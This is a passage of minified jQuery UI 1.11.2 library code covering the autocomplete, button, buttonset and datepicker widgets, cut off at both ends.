a.ESCAPE:this.menu.element.is(":visible")&&(this.isMultiLine||this._value(this.term),this.close(n),n.preventDefault());break;default:i=!0,this._searchTimeout(n)}},keypress:function(s){if(t)return t=!1,(!this.isMultiLine||this.menu.element.is(":visible"))&&s.preventDefault(),void 0;if(!i){var n=e.ui.keyCode;switch(s.keyCode){case n.PAGE_UP:this._move("previousPage",s);break;case n.PAGE_DOWN:this._move("nextPage",s);break;case n.UP:this._keyEvent("previous",s);break;case n.DOWN:this._keyEvent("next",s)}}},input:function(e){return s?(s=!1,e.preventDefault(),void 0):(this._searchTimeout(e),void 0)},focus:function(){this.selectedItem=null,this.previous=this._value()},blur:function(e){return this.cancelBlur?(delete this.cancelBlur,void 0):(clearTimeout(this.searching),this.close(e),this._change(e),void 0)}}),this._initSource(),this.menu=e("<ul>").addClass("ui-autocomplete ui-front").appendTo(this._appendTo()).menu({role:null}).hide().menu("instance"),this._on(this.menu.element,{mousedown:function(t){t.preventDefault(),this.cancelBlur=!0,this._delay(function(){delete this.cancelBlur});var i=this.menu.element[0];e(t.target).closest(".ui-menu-item").length||this._delay(function(){var t=this;this.document.one("mousedown",function(s){s.target===t.element[0]||s.target===i||e.contains(i,s.target)||t.close()})})},menufocus:function(t,i){var s,n;return this.isNewMenu&&(this.isNewMenu=!1,t.originalEvent&&/^mouse/.test(t.originalEvent.type))?(this.menu.blur(),this.document.one("mousemove",function(){e(t.target).trigger(t.originalEvent)}),void 0):(n=i.item.data("ui-autocomplete-item"),!1!==this._trigger("focus",t,{item:n})&&t.originalEvent&&/^key/.test(t.originalEvent.type)&&this._value(n.value),s=i.item.attr("aria-label")||n.value,s&&e.trim(s).length&&(this.liveRegion.children().hide(),e("<div>").text(s).appendTo(this.liveRegion)),void 0)},menuselect:function(e,t){var i=t.item.data("ui-autocomplete-item"),s=this.previous;this.element[0]!==this.document[0].activeElement&&(this.element.focus(),this.previous=s,this._delay(function(){this.previous=s,this.selectedItem=i})),!1!==this._trigger("select",e,{item:i})&&this._value(i.value),this.term=this._value(),this.close(e),this.selectedItem=i}}),this.liveRegion=e("<span>",{role:"status","aria-live":"assertive","aria-relevant":"additions"}).addClass("ui-helper-hidden-accessible").appendTo(this.document[0].body),this._on(this.window,{beforeunload:function(){this.element.removeAttr("autocomplete")}})},_destroy:function(){clearTimeout(this.searching),this.element.removeClass("ui-autocomplete-input").removeAttr("autocomplete"),this.menu.element.remove(),this.liveRegion.remove()},_setOption:function(e,t){this._super(e,t),"source"===e&&this._initSource(),"appendTo"===e&&this.menu.element.appendTo(this._appendTo()),"disabled"===e&&t&&this.xhr&&this.xhr.abort()},_appendTo:function(){var t=this.options.appendTo;return t&&(t=t.jquery||t.nodeType?e(t):this.document.find(t).eq(0)),t&&t[0]||(t=this.element.closest(".ui-front")),t.length||(t=this.document[0].body),t},_initSource:function(){var t,i,s=this;e.isArray(this.options.source)?(t=this.options.source,this.source=function(i,s){s(e.ui.autocomplete.filter(t,i.term))}):"string"==typeof this.options.source?(i=this.options.source,this.source=function(t,n){s.xhr&&s.xhr.abort(),s.xhr=e.ajax({url:i,data:t,dataType:"json",success:function(e){n(e)},error:function(){n([])}})}):this.source=this.options.source},_searchTimeout:function(e){clearTimeout(this.searching),this.searching=this._delay(function(){var t=this.term===this._value(),i=this.menu.element.is(":visible"),s=e.altKey||e.ctrlKey||e.metaKey||e.shiftKey;(!t||t&&!i&&!s)&&(this.selectedItem=null,this.search(null,e))},this.options.delay)},search:function(e,t){return e=null!=e?e:this._value(),this.term=this._value(),e.length<this.options.minLength?this.close(t):this._trigger("search",t)!==!1?this._search(e):void 0},_search:function(e){this.pending++,this.element.addClass("ui-autocomplete-loading"),this.cancelSearch=!1,this.source({term:e},this._response())},_response:function(){var t=++this.requestIndex;return e.proxy(function(e){t===this.requestIndex&&this.__response(e),this.pending--,this.pending||this.element.removeClass("ui-autocomplete-loading")},this)},__response:function(e){e&&(e=this._normalize(e)),this._trigger("response",null,{content:e}),!this.options.disabled&&e&&e.length&&!this.cancelSearch?(this._suggest(e),this._trigger("open")):this._close()},close:function(e){this.cancelSearch=!0,this._close(e)},_close:function(e){this.menu.element.is(":visible")&&(this.menu.element.hide(),this.menu.blur(),this.isNewMenu=!0,this._trigger("close",e))},_change:function(e){this.previous!==this._value()&&this._trigger("change",e,{item:this.selectedItem})},_normalize:function(t){return t.length&&t[0].label&&t[0].value?t:e.map(t,function(t){return"string"==typeof t?{label:t,value:t}:e.extend({},t,{label:t.label||t.value,value:t.value||t.label})})},_suggest:function(t){var i=this.menu.element.empty();this._renderMenu(i,t),this.isNewMenu=!0,this.menu.refresh(),i.show(),this._resizeMenu(),i.position(e.extend({of:this.element},this.options.position)),this.options.autoFocus&&this.menu.next()},_resizeMenu:function(){var e=this.menu.element;e.outerWidth(Math.max(e.width("").outerWidth()+1,this.element.outerWidth()))},_renderMenu:function(t,i){var s=this;e.each(i,function(e,i){s._renderItemData(t,i)})},_renderItemData:function(e,t){return this._renderItem(e,t).data("ui-autocomplete-item",t)},_renderItem:function(t,i){return e("<li>").text(i.label).appendTo(t)},_move:function(e,t){return this.menu.element.is(":visible")?this.menu.isFirstItem()&&/^previous/.test(e)||this.menu.isLastItem()&&/^next/.test(e)?(this.isMultiLine||this._value(this.term),this.menu.blur(),void 0):(this.menu[e](t),void 0):(this.search(null,t),void 0)},widget:function(){return this.menu.element},_value:function(){return this.valueMethod.apply(this.element,arguments)},_keyEvent:function(e,t){(!this.isMultiLine||this.menu.element.is(":visible"))&&(this._move(e,t),t.preventDefault())}}),e.extend(e.ui.autocomplete,{escapeRegex:function(e){return e.replace(/[\-\[\]{}()*+?.,\\\^$|#\s]/g,"\\$&")},filter:function(t,i){var s=RegExp(e.ui.autocomplete.escapeRegex(i),"i");return e.grep(t,function(e){return s.test(e.label||e.value||e)})}}),e.widget("ui.autocomplete",e.ui.autocomplete,{options:{messages:{noResults:"No search results.",results:function(e){return e+(e>1?" results are":" result is")+" available, use up and down arrow keys to navigate."}}},__response:function(t){var i;this._superApply(arguments),this.options.disabled||this.cancelSearch||(i=t&&t.length?this.options.messages.results(t.length):this.options.messages.noResults,this.liveRegion.children().hide(),e("<div>").text(i).appendTo(this.liveRegion))}}),e.ui.autocomplete;var c,p="ui-button ui-widget ui-state-default ui-corner-all",f="ui-button-icons-only ui-button-icon-only ui-button-text-icons ui-button-text-icon-primary ui-button-text-icon-secondary ui-button-text-only",m=function(){var t=e(this);setTimeout(function(){t.find(":ui-button").button("refresh")},1)},g=function(t){var i=t.name,s=t.form,n=e([]);return i&&(i=i.replace(/'/g,"\\'"),n=s?e(s).find("[name='"+i+"'][type=radio]"):e("[name='"+i+"'][type=radio]",t.ownerDocument).filter(function(){return!this.form})),n};e.widget("ui.button",{version:"1.11.2",defaultElement:"<button>",options:{disabled:null,text:!0,label:null,icons:{primary:null,secondary:null}},_create:function(){this.element.closest("form").unbind("reset"+this.eventNamespace).bind("reset"+this.eventNamespace,m),"boolean"!=typeof this.options.disabled?this.options.disabled=!!this.element.prop("disabled"):this.element.prop("disabled",this.options.disabled),this._determineButtonType(),this.hasTitle=!!this.buttonElement.attr("title");var t=this,i=this.options,s="checkbox"===this.type||"radio"===this.type,n=s?"":"ui-state-active";null===i.label&&(i.label="input"===this.type?this.buttonElement.val():this.buttonElement.html()),this._hoverable(this.buttonElement),this.buttonElement.addClass(p).attr("role","button").bind("mouseenter"+this.eventNamespace,function(){i.disabled||this===c&&e(this).addClass("ui-state-active")}).bind("mouseleave"+this.eventNamespace,function(){i.disabled||e(this).removeClass(n)}).bind("click"+this.eventNamespace,function(e){i.disabled&&(e.preventDefault(),e.stopImmediatePropagation())}),this._on({focus:function(){this.buttonElement.addClass("ui-state-focus")},blur:function(){this.buttonElement.removeClass("ui-state-focus")}}),s&&this.element.bind("change"+this.eventNamespace,function(){t.refresh()}),"checkbox"===this.type?this.buttonElement.bind("click"+this.eventNamespace,function(){return i.disabled?!1:void 0}):"radio"===this.type?this.buttonElement.bind("click"+this.eventNamespace,function(){if(i.disabled)return!1;e(this).addClass("ui-state-active"),t.buttonElement.attr("aria-pressed","true");var s=t.element[0];g(s).not(s).map(function(){return e(this).button("widget")[0]}).removeClass("ui-state-active").attr("aria-pressed","false")}):(this.buttonElement.bind("mousedown"+this.eventNamespace,function(){return i.disabled?!1:(e(this).addClass("ui-state-active"),c=this,t.document.one("mouseup",function(){c=null}),void 0)}).bind("mouseup"+this.eventNamespace,function(){return i.disabled?!1:(e(this).removeClass("ui-state-active"),void 0)}).bind("keydown"+this.eventNamespace,function(t){return i.disabled?!1:((t.keyCode===e.ui.keyCode.SPACE||t.keyCode===e.ui.keyCode.ENTER)&&e(this).addClass("ui-state-active"),void 0)}).bind("keyup"+this.eventNamespace+" blur"+this.eventNamespace,function(){e(this).removeClass("ui-state-active")}),this.buttonElement.is("a")&&this.buttonElement.keyup(function(t){t.keyCode===e.ui.keyCode.SPACE&&e(this).click()})),this._setOption("disabled",i.disabled),this._resetButton()},_determineButtonType:function(){var e,t,i;this.type=this.element.is("[type=checkbox]")?"checkbox":this.element.is("[type=radio]")?"radio":this.element.is("input")?"input":"button","checkbox"===this.type||"radio"===this.type?(e=this.element.parents().last(),t="label[for='"+this.element.attr("id")+"']",this.buttonElement=e.find(t),this.buttonElement.length||(e=e.length?e.siblings():this.element.siblings(),this.buttonElement=e.filter(t),this.buttonElement.length||(this.buttonElement=e.find(t))),this.element.addClass("ui-helper-hidden-accessible"),i=this.element.is(":checked"),i&&this.buttonElement.addClass("ui-state-active"),this.buttonElement.prop("aria-pressed",i)):this.buttonElement=this.element},widget:function(){return this.buttonElement},_destroy:function(){this.element.removeClass("ui-helper-hidden-accessible"),this.buttonElement.removeClass(p+" ui-state-active "+f).removeAttr("role").removeAttr("aria-pressed").html(this.buttonElement.find(".ui-button-text").html()),this.hasTitle||this.buttonElement.removeAttr("title")},_setOption:function(e,t){return this._super(e,t),"disabled"===e?(this.widget().toggleClass("ui-state-disabled",!!t),this.element.prop("disabled",!!t),t&&("checkbox"===this.type||"radio"===this.type?this.buttonElement.removeClass("ui-state-focus"):this.buttonElement.removeClass("ui-state-focus ui-state-active")),void 0):(this._resetButton(),void 0)},refresh:function(){var t=this.element.is("input, button")?this.element.is(":disabled"):this.element.hasClass("ui-button-disabled");t!==this.options.disabled&&this._setOption("disabled",t),"radio"===this.type?g(this.element[0]).each(function(){e(this).is(":checked")?e(this).button("widget").addClass("ui-state-active").attr("aria-pressed","true"):e(this).button("widget").removeClass("ui-state-active").attr("aria-pressed","false")}):"checkbox"===this.type&&(this.element.is(":checked")?this.buttonElement.addClass("ui-state-active").attr("aria-pressed","true"):this.buttonElement.removeClass("ui-state-active").attr("aria-pressed","false"))},_resetButton:function(){if("input"===this.type)return this.options.label&&this.element.val(this.options.label),void 0;var t=this.buttonElement.removeClass(f),i=e("<span></span>",this.document[0]).addClass("ui-button-text").html(this.options.label).appendTo(t.empty()).text(),s=this.options.icons,n=s.primary&&s.secondary,a=[];s.primary||s.secondary?(this.options.text&&a.push("ui-button-text-icon"+(n?"s":s.primary?"-primary":"-secondary")),s.primary&&t.prepend("<span class='ui-button-icon-primary ui-icon "+s.primary+"'></span>"),s.secondary&&t.append("<span class='ui-button-icon-secondary ui-icon "+s.secondary+"'></span>"),this.options.text||(a.push(n?"ui-button-icons-only":"ui-button-icon-only"),this.hasTitle||t.attr("title",e.trim(i)))):a.push("ui-button-text-only"),t.addClass(a.join(" "))}}),e.widget("ui.buttonset",{version:"1.11.2",options:{items:"button, input[type=button], input[type=submit], input[type=reset], input[type=checkbox], input[type=radio], a, :data(ui-button)"},_create:function(){this.element.addClass("ui-buttonset")},_init:function(){this.refresh()},_setOption:function(e,t){"disabled"===e&&this.buttons.button("option",e,t),this._super(e,t)},refresh:function(){var t="rtl"===this.element.css("direction"),i=this.element.find(this.options.items),s=i.filter(":ui-button");i.not(":ui-button").button(),s.button("refresh"),this.buttons=i.map(function(){return e(this).button("widget")[0]}).removeClass("ui-corner-all ui-corner-left ui-corner-right").filter(":first").addClass(t?"ui-corner-right":"ui-corner-left").end().filter(":last").addClass(t?"ui-corner-left":"ui-corner-right").end().end()},_destroy:function(){this.element.removeClass("ui-buttonset"),this.buttons.map(function(){return e(this).button("widget")[0]}).removeClass("ui-corner-left ui-corner-right").end().button("destroy")}}),e.ui.button,e.extend(e.ui,{datepicker:{version:"1.11.2"}});var v;e.extend(n.prototype,{markerClassName:"hasDatepicker",maxRows:4,_widgetDatepicker:function(){return this.dpDiv},setDefaults:function(e){return r(this._defaults,e||{}),this},_attachDatepicker:function(t,i){var s,n,a;s=t.nodeName.toLowerCase(),n="div"===s||"span"===s,t.id||(this.uuid+=1,t.id="dp"+this.uuid),a=this._newInst(e(t),n),a.settings=e.extend({},i||{}),"input"===s?this._connectDatepicker(t,a):n&&this._inlineDatepicker(t,a)},_newInst:function(t,i){var s=t[0].id.replace(/([^A-Za-z0-9_\-])/g,"\\\\$1");return{id:s,input:t,selectedDay:0,selectedMonth:0,selectedYear:0,drawMonth:0,drawYear:0,inline:i,dpDiv:i?a(e("<div class='"+this._inlineClass+" ui-datepicker ui-widget ui-widget-content ui-helper-clearfix ui-corner-all'></div>")):this.dpDiv}},_connectDatepicker:function(t,i){var s=e(t);i.append=e([]),i.trigger=e([]),s.hasClass(this.markerClassName)||(this._attachments(s,i),s.addClass(this.markerClassName).keydown(this._doKeyDown).keypress(this._doKeyPress).keyup(this._doKeyUp),this._autoSize(i),e.data(t,"datepicker",i),i.settings.disabled&&this._disableDatepicker(t))},_attachments:function(t,i){var s,n,a,o=this._get(i,"appendText"),r=this._get(i,"isRTL");i.append&&i.append.remove(),o&&(i.append=e("<span class='"+this._appendClass+"'>"+o+"</span>"),t[r?"before":"after"](i.append)),t.unbind("focus",this._showDatepicker),i.trigger&&i.trigger.remove(),s=this._get(i,"showOn"),("focus"===s||"both"===s)&&t.focus(this._showDatepicker),("button"===s||"both"===s)&&(n=this._get(i,"buttonText"),a=this._get(i,"buttonImage"),i.trigger=e(this._get(i,"buttonImageOnly")?e("<img/>").addClass(this._triggerClass).attr({src:a,alt:n,title:n}):e("<button type='button'></button>").addClass(this._triggerClass).html(a?e("<img/>").attr({src:a,alt:n,title:n}):n)),t[r?"before":"after"](i.trigger),i.trigger.click(function(){return e.datepicker._datepickerShowing&&e.datepicker._lastInput===t[0]?e.datepicker._hideDatepicker():e.datepicker._datepickerShowing&&e.datepicker._lastInput!==t[0]?(e.datepicker._hideDatepicker(),e.datepicker._showDatepicker(t[0])):e.datepicker._showDatepicker(t[0]),!1}))},_autoSize:function(e){if(this._get(e,"autoSize")&&!e.inline){var t,i,s,n,a=new Date(2009,11,20),o=this._get(e,"dateFormat");o.match(/[DM]/)&&(t=function(e){for(i=0,s=0,n=0;e.length>n;n++)e[n].length>i&&(i=e[n].length,s=n);return s},a.setMonth(t(this._get(e,o.match(/MM/)?"monthNames":"monthNamesShort"))),a.setDate(t(this._get(e,o.match(/DD/)?"dayNames":"dayNamesShort"))+20-a.getDay())),e.input.attr("size",this._formatDate(e,a).length)}},_inlineDatepicker:function(t,i){var s=e(t);s.hasClass(this.markerClassName)||(s.addClass(this.markerClassName).append(i.dpDiv),e.data(t,"datepicker",i),this._setDate(i,this._getDefaultDate(i),!0),this._updateDatepicker(i),this._updateAlternate(i),i.settings.disabled&&this._disableDatepicker(t),i.dpDiv.css("display","block"))},_dialogDatepicker:function(t,i,s,n,a){var o,h,l,u,d,c=this._dialogInst;return c||(this.uuid+=1,o="dp"+this.uuid,this._dialogInput=e("<input type='text' id='"+o+"' style='position: absolute; top: -100px; width: 0px;'/>"),this._dialogInput.keydown(this._doKeyDown),e("body").append(this._dialogInput),c=this._dialogInst=this._newInst(this._dialogInput,!1),c.settings={},e.data(this._dialogInput[0],"datepicker",c)),r(c.settings,n||{}),i=i&&i.constructor===Date?this._formatDate(c,i):i,this._dialogInput.val(i),this._pos=a?a.length?a:[a.pageX,a.pageY]:null,this._pos||(h=document.documentElement.clientWidth,l=document.documentElement.clientHeight,u=document.documentElement.scrollLeft||document.body.scrollLeft,d=document.documentElement.scrollTop||document.body.scrollTop,this._pos=[h/2-100+u,l/2-150+d]),this._dialogInput.css("left",this._pos[0]+20+"px").css("top",this._pos[1]+"px"),c.settings.onSelect=s,this._inDialog=!0,this.dpDiv.addClass(this._dialogClass),this._showDatepicker(this._dialogInput[0]),e.blockUI&&e.blockUI(this.dpDiv),e.data(this._dialogInput[0],"datepicker",c),this},_destroyDatepicker:function(t){var i,s=e(t),n=e.data(t,"datepicker");s.hasClass(this.markerClassName)&&(i=t.nodeName.toLowerCase(),e.removeData(t,"datepicker"),"input"===i?(n.append.remove(),n.trigger.remove(),s.removeClass(this.markerClassName).unbind("focus",this._showDatepicker).unbind("keydown",this._doKeyDown).unbind("keypress",this._doKeyPress).unbind("keyup",this._doKeyUp)):("div"===i||"span"===i)&&s.removeClass(this.markerClassName).empty())},_enableDatepicker:function(t){var i,s,n=e(t),a=e.data(t,"datepicker");n.hasClass(this.markerClassName)&&(i=t.nodeName.toLowerCase(),"input"===i?(t.disabled=!1,a.trigger.filter("button").each(function(){this.disabled=!1}).end().filter("img").css({opacity:"1.0",cursor:""})):("div"===i||"span"===i)&&(s=n.children("."+this._inlineClass),s.children().removeClass("ui-state-disabled"),s.find("select.ui-datepicker-month, select.ui-datepicker-year").prop("disabled",!1)),this._disabledInputs=e.map(this._disabledInputs,function(e){return e===t?null:e}))},_disableDatepicker:function(t){var i,s,n=e(t),a=e.data(t,"datepicker");n.hasClass(this.markerClassName)&&(i=t.nodeName.toLowerCase(),"input"===i?(t.disabled=!0,a.trigger.filter("button").each(function(){this.disabled=!0}).end().filter("img").css({opacity:"0.5",cursor:"default"})):("div"===i||"span"===i)&&(s=n.children("."+this._inlineClass),s.children().addClass("ui-state-disabled"),s.find("select.ui-datepicker-month, select.ui-datepicker-year").prop("disabled",!0)),this._disabledInputs=e.map(this._disabledInputs,function(e){return e===t?null:e}),this._disabledInputs[this._disabledInputs.length]=t)},_isDisabledDatepicker:function(e){if(!e)return!1;for(var t=0;this._disabledInputs.length>t;t++)if(this._disabledInputs[t]===e)return!0;return!1},_getInst:function(t){try{return e.data(t,"datepicker")}catch(i){throw"Missing instance data for this datepicker"}},_optionDatepicker:function(t,i,s){var n,a,o,h,l=this._getInst(t);return 2===arguments.length&&"string"==typeof i?"defaults"===i?e.extend({},e.datepicker._defaults):l?"all"===i?e.extend({},l.settings):this._get(l,i):null:(n=i||{},"string"==typeof i&&(n={},n[i]=s),l&&(this._curInst===l&&this._hideDatepicker(),a=this._getDateDatepicker(t,!0),o=this._getMinMaxDate(l,"min"),h=this._getMinMaxDate(l,"max"),r(l.settings,n),null!==o&&void 0!==n.dateFormat&&void 0===n.minDate&&(l.settings.minDate=this._formatDate(l,o)),null!==h&&void 0!==n.dateFormat&&void 0===n.maxDate&&(l.settings.maxDate=this._formatDate(l,h)),"disabled"in n&&(n.disabled?this._disableDatepicker(t):this._enableDatepicker(t)),this._attachments(e(t),l),this._autoSize(l),this._setDate(l,a),this._updateAlternate(l),this._updateDatepicker(l)),void 0)},_changeDatepicker:function(e,t,i){this._optionDatepicker(e,t,i)},_refreshDatepicker:function(e){var t=this._getInst(e);t&&this._updateDatepicker(t)},_setDateDatepicker:function(e,t){var i=this._getInst(e);i&&(this._setDate(i,t),this._updateDatepicker(i),this._updateAlternate(i))},_getDateDatepicker:function(e,t){var i=this._getInst(e);return i&&!i.inline&&this._setDateFromField(i,t),i?this._getDate(i):null},_doKeyDown:function(t){var i,s,n,a=e.datepicker._getInst(t.target),o=!0,r=a.dpDiv.is(".ui-datepicker-rtl");if(a._keyEvent=!0,e.datepicker._datepickerShowing)switch(t.keyCode){case 9:e.datepicker._hideDatepicker(),o=!1;break;case 13:return n=e("td."+e.datepicker._dayOverClass+":not(."+e.datepicker._currentClass+")",a.dpDiv),n[0]&&e.datepicker._selectDay(t.target,a.selectedMonth,a.selectedYear,n[0]),i=e.datepicker._get(a,"onSelect"),i?(s=e.datepicker._formatDate(a),i.apply(a.input?a.input[0]:null,[s,a])):e.datepicker._hideDatepicker(),!1;case 27:e.datepicker._hideDatepicker();break;case 33:e.datepicker._adjustDate(t.target,t.ctrlKey?-e.datepicker._get(a,"stepBigMonths"):-e.datepicker._get(a,"stepMonths"),"M");break;case 34:e.datepicker._adjustDate(t.target,t.ctrlKey?+e.datepicker._get(a,"stepBigMonths"):+e.datepicker._get(a,"stepMonths"),"M");break;case 35:(t.ctrlKey||t.metaKey)&&e.datepicker._clearDate(t.target),o=t.ctrlKey||t.metaKey;break;case 36:(t.ctrlKey||t.metaKey)&&e.datepicker._gotoToday(t.target),o=t.ctrlKey||t.metaKey;break;case 37:(t.ctrlKey||t.metaKey)&&e.datepicker._adjustDate(t.target,r?1:-1,"D"),o=t.ctrlKey||t.metaKey,t.originalEvent.altKey&&e.datepicker._adjustDate(t.target,t.ctrlKey?-e.datepicker._get(a,"stepBigMonths"):-e.datepicker._get(a,"stepMonths"),"M");break;case 38:(t.ctrlKey||t.metaKey)&&e.datepicker._adjustDate(t.target,-7,"D"),o=t.ctrlKey||t.metaKey;break;case 39:(t.ctrlKey||t.metaKey)&&e.datepicker._adjustDate(t.target,r?-1:1,"D"),o=t.ctrlKey||t.metaKey,t.originalEvent.altKey&&e.datepicker._adjustDate(t.target,t.ctrlKey?+e.datepicker._get(a,"stepBigMonths"):+e.datepicker._get(a,"stepMonths"),"M");break;case 40:(t.ctrlKey||t.metaKey)&&e.datepicker._adjustDate(t.target,7,"D"),o=t.ctrlKey||t.metaKey;break;default:o=!1}else 36===t.keyCode&&t.ctrlKey?e.datepicker._showDatepicker(this):o=!1;o&&(t.preventDefault(),t.stopPropagation())},_doKeyPress:function(t){var i,s,n=e.datepicker._getInst(t.target);return e.datepicker._get(n,"constrainInput")?(i=e.datepicker._possibleChars(e.datepicker._get(n,"dateFormat")),s=String.fromCharCode(null==t.charCode?t.keyCode:t.charCode),t.ctrlKey||t.metaKey||" ">s||!i||i.indexOf(s)>-1):void 0
},_doKeyUp:function(t){var i,s=e.datepicker._getInst(t.target);if(s.input.val()!==s.lastVal)try{i=e.datepicker.parseDate(e.datepicker._get(s,"dateFormat"),s.input?s.input.val():null,e.datepicker._getFormatConfig(s)),i&&(e.datepicker._setDateFromField(s),e.datepicker._updateAlternate(s),e.datepicker._updateDatepicker(s))}catch(n){}return!0},_showDatepicker:function(t){if(t=t.target||t,"input"!==t.nodeName.toLowerCase()&&(t=e("input",t.parentNode)[0]),!e.datepicker._isDisabledDatepicker(t)&&e.datepicker._lastInput!==t){var i,n,a,o,h,l,u;i=e.datepicker._getInst(t),e.datepicker._curInst&&e.datepicker._curInst!==i&&(e.datepicker._curInst.dpDiv.stop(!0,!0),i&&e.datepicker._datepickerShowing&&e.datepicker._hideDatepicker(e.datepicker._curInst.input[0])),n=e.datepicker._get(i,"beforeShow"),a=n?n.apply(t,[t,i]):{},a!==!1&&(r(i.settings,a),i.lastVal=null,e.datepicker._lastInput=t,e.datepicker._setDateFromField(i),e.datepicker._inDialog&&(t.value=""),e.datepicker._pos||(e.datepicker._pos=e.datepicker._findPos(t),e.datepicker._pos[1]+=t.offsetHeight),o=!1,e(t).parents().each(function(){return o|="fixed"===e(this).css("position"),!o}),h={left:e.datepicker._pos[0],top:e.datepicker._pos[1]},e.datepicker._pos=null,i.dpDiv.empty(),i.dpDiv.css({position:"absolute",display:"block",top:"-1000px"}),e.datepicker._updateDatepicker(i),h=e.datepicker._checkOffset(i,h,o),i.dpDiv.css({position:e.datepicker._inDialog&&e.blockUI?"static":o?"fixed":"absolute",display:"none",left:h.left+"px",top:h.top+"px"}),i.inline||(l=e.datepicker._get(i,"showAnim"),u=e.datepicker._get(i,"duration"),i.dpDiv.css("z-index",s(e(t))+1),e.datepicker._datepickerShowing=!0,e.effects&&e.effects.effect[l]?i.dpDiv.show(l,e.datepicker._get(i,"showOptions"),u):i.dpDiv[l||"show"](l?u:null),e.datepicker._shouldFocusInput(i)&&i.input.focus(),e.datepicker._curInst=i))}},_updateDatepicker:function(t){this.maxRows=4,v=t,t.dpDiv.empty().append(this._generateHTML(t)),this._attachHandlers(t);var i,s=this._getNumberOfMonths(t),n=s[1],a=17,r=t.dpDiv.find("."+this._dayOverClass+" a");r.length>0&&o.apply(r.get(0)),t.dpDiv.removeClass("ui-datepicker-multi-2 ui-datepicker-multi-3 ui-datepicker-multi-4").width(""),n>1&&t.dpDiv.addClass("ui-datepicker-multi-"+n).css("width",a*n+"em"),t.dpDiv[(1!==s[0]||1!==s[1]?"add":"remove")+"Class"]("ui-datepicker-multi"),t.dpDiv[(this._get(t,"isRTL")?"add":"remove")+"Class"]("ui-datepicker-rtl"),t===e.datepicker._curInst&&e.datepicker._datepickerShowing&&e.datepicker._shouldFocusInput(t)&&t.input.focus(),t.yearshtml&&(i=t.yearshtml,setTimeout(function(){i===t.yearshtml&&t.yearshtml&&t.dpDiv.find("select.ui-datepicker-year:first").replaceWith(t.yearshtml),i=t.yearshtml=null},0))},_shouldFocusInput:function(e){return e.input&&e.input.is(":visible")&&!e.input.is(":disabled")&&!e.input.is(":focus")},_checkOffset:function(t,i,s){var n=t.dpDiv.outerWidth(),a=t.dpDiv.outerHeight(),o=t.input?t.input.outerWidth():0,r=t.input?t.input.outerHeight():0,h=document.documentElement.clientWidth+(s?0:e(document).scrollLeft()),l=document.documentElement.clientHeight+(s?0:e(document).scrollTop());return i.left-=this._get(t,"isRTL")?n-o:0,i.left-=s&&i.left===t.input.offset().left?e(document).scrollLeft():0,i.top-=s&&i.top===t.input.offset().top+r?e(document).scrollTop():0,i.left-=Math.min(i.left,i.left+n>h&&h>n?Math.abs(i.left+n-h):0),i.top-=Math.min(i.top,i.top+a>l&&l>a?Math.abs(a+r):0),i},_findPos:function(t){for(var i,s=this._getInst(t),n=this._get(s,"isRTL");t&&("hidden"===t.type||1!==t.nodeType||e.expr.filters.hidden(t));)t=t[n?"previousSibling":"nextSibling"];return i=e(t).offset(),[i.left,i.top]},_hideDatepicker:function(t){var i,s,n,a,o=this._curInst;!o||t&&o!==e.data(t,"datepicker")||this._datepickerShowing&&(i=this._get(o,"showAnim"),s=this._get(o,"duration"),n=function(){e.datepicker._tidyDialog(o)},e.effects&&(e.effects.effect[i]||e.effects[i])?o.dpDiv.hide(i,e.datepicker._get(o,"showOptions"),s,n):o.dpDiv["slideDown"===i?"slideUp":"fadeIn"===i?"fadeOut":"hide"](i?s:null,n),i||n(),this._datepickerShowing=!1,a=this._get(o,"onClose"),a&&a.apply(o.input?o.input[0]:null,[o.input?o.input.val():"",o]),this._lastInput=null,this._inDialog&&(this._dialogInput.css({position:"absolute",left:"0",top:"-100px"}),e.blockUI&&(e.unblockUI(),e("body").append(this.dpDiv))),this._inDialog=!1)},_tidyDialog:function(e){e.dpDiv.removeClass(this._dialogClass).unbind(".ui-datepicker-calendar")},_checkExternalClick:function(t){if(e.datepicker._curInst){var i=e(t.target),s=e.datepicker._getInst(i[0]);(i[0].id!==e.datepicker._mainDivId&&0===i.parents("#"+e.datepicker._mainDivId).length&&!i.hasClass(e.datepicker.markerClassName)&&!i.closest("."+e.datepicker._triggerClass).length&&e.datepicker._datepickerShowing&&(!e.datepicker._inDialog||!e.blockUI)||i.hasClass(e.datepicker.markerClassName)&&e.datepicker._curInst!==s)&&e.datepicker._hideDatepicker()}},_adjustDate:function(t,i,s){var n=e(t),a=this._getInst(n[0]);this._isDisabledDatepicker(n[0])||(this._adjustInstDate(a,i+("M"===s?this._get(a,"showCurrentAtPos"):0),s),this._updateDatepicker(a))},_gotoToday:function(t){var i,s=e(t),n=this._getInst(s[0]);this._get(n,"gotoCurrent")&&n.currentDay?(n.selectedDay=n.currentDay,n.drawMonth=n.selectedMonth=n.currentMonth,n.drawYear=n.selectedYear=n.currentYear):(i=new Date,n.selectedDay=i.getDate(),n.drawMonth=n.selectedMonth=i.getMonth(),n.drawYear=n.selectedYear=i.getFullYear()),this._notifyChange(n),this._adjustDate(s)},_selectMonthYear:function(t,i,s){var n=e(t),a=this._getInst(n[0]);a["selected"+("M"===s?"Month":"Year")]=a["draw"+("M"===s?"Month":"Year")]=parseInt(i.options[i.selectedIndex].value,10),this._notifyChange(a),this._adjustDate(n)},_selectDay:function(t,i,s,n){var a,o=e(t);e(n).hasClass(this._unselectableClass)||this._isDisabledDatepicker(o[0])||(a=this._getInst(o[0]),a.selectedDay=a.currentDay=e("a",n).html(),a.selectedMonth=a.currentMonth=i,a.selectedYear=a.currentYear=s,this._selectDate(t,this._formatDate(a,a.currentDay,a.currentMonth,a.currentYear)))},_clearDate:function(t){var i=e(t);this._selectDate(i,"")},_selectDate:function(t,i){var s,n=e(t),a=this._getInst(n[0]);i=null!=i?i:this._formatDate(a),a.input&&a.input.val(i),this._updateAlternate(a),s=this._get(a,"onSelect"),s?s.apply(a.input?a.input[0]:null,[i,a]):a.input&&a.input.trigger("change"),a.inline?this._updateDatepicker(a):(this._hideDatepicker(),this._lastInput=a.input[0],"object"!=typeof a.input[0]&&a.input.focus(),this._lastInput=null)},_updateAlternate:function(t){var i,s,n,a=this._get(t,"altField");a&&(i=this._get(t,"altFormat")||this._get(t,"dateFormat"),s=this._getDate(t),n=this.formatDate(i,s,this._getFormatConfig(t)),e(a).each(function(){e(this).val(n)}))},noWeekends:function(e){var t=e.getDay();return[t>0&&6>t,""]},iso8601Week:function(e){var t,i=new Date(e.getTime());return 